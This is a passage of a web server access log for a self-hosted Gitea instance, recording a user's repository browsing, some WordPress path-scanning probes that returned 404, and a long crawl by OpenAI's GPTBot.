GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:23 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:08:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 222.117.41.51] [Length 26672] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 53] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:08:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:08:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 222.117.41.51] [Length 405210] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 105] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:09:19:49 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 167.172.221.95] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" -[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 167.172.221.95] [Length 9348] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" -[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/robots.txt" [Client 167.172.221.95] [Length 9347] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" -[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/" [Client 167.172.221.95] [Length 9334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" -[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wordpress/" [Client 167.172.221.95] [Length 9339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" -[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp/" [Client 167.172.221.95] [Length 9332] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" -[17/Feb/2026:10:44:14 +0000] - 405 405 - POST https git.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr" -[17/Feb/2026:10:44:15 +0000] - 405 405 - POST https git.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr" -[17/Feb/2026:12:58:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:12:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 74.7.227.38] [Length 5663] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" -[17/Feb/2026:12:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 74.7.227.38] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 74.7.227.38] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 74.7.227.38] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 74.7.227.38] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/sign_up" [Client 74.7.227.38] [Length 4379] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos" [Client 74.7.227.38] [Length 6686] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 74.7.227.38] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/api/swagger" [Client 74.7.227.38] [Length 458] [Gzip 1.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 74.7.227.38] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/licenses.txt" [Client 74.7.227.38] [Length 89511] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:12:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js.4cf15d9a.map" [Client 74.7.227.38] [Length 313113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/assets/js/index.js?v=1.25.3" -[17/Feb/2026:12:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/user/sign_up" -[17/Feb/2026:12:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/forks" [Client 74.7.227.38] [Length 7275] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/forks" [Client 74.7.227.38] [Length 7293] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=C%23&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6313] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/forks" [Client 74.7.227.38] [Length 7287] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/stars" [Client 74.7.227.38] [Length 7373] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer" [Client 74.7.227.38] [Length 8146] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/stars" [Client 74.7.227.38] [Length 7371] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer" [Client 74.7.227.38] [Length 15455] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 74.7.227.38] [Length 17172] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations" [Client 74.7.227.38] [Length 5056] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver" [Client 74.7.227.38] [Length 14545] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:12:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/packages" [Client 74.7.227.38] [Length 7389] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:12:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls" [Client 74.7.227.38] [Length 9917] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:12:59:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/" [Client 74.7.227.38] [Length 47] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:12:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer" [Client 74.7.227.38] [Length 15456] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/" -[17/Feb/2026:12:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/actions" [Client 74.7.227.38] [Length 7411] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:12:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/wiki" [Client 74.7.227.38] [Length 7353] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:12:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer.rss" [Client 74.7.227.38] [Length 26276] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:12:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer.atom" [Client 74.7.227.38] [Length 27879] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:12:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 387643] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:12:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 190970] [Gzip 11.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:12:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 34235] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:12:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 106842] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:12:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 188111] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:12:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 400215] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:12:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 23173] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:12:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 17425] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:12:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 17085] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:12:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 17055] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:12:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 174784] [Gzip 16.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:12:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 196532] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 137209] [Gzip 14.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 34280] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 14390] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 188155] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 57787] [Gzip 10.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 23196] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 86375] [Gzip 15.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 212863] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 51922] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr 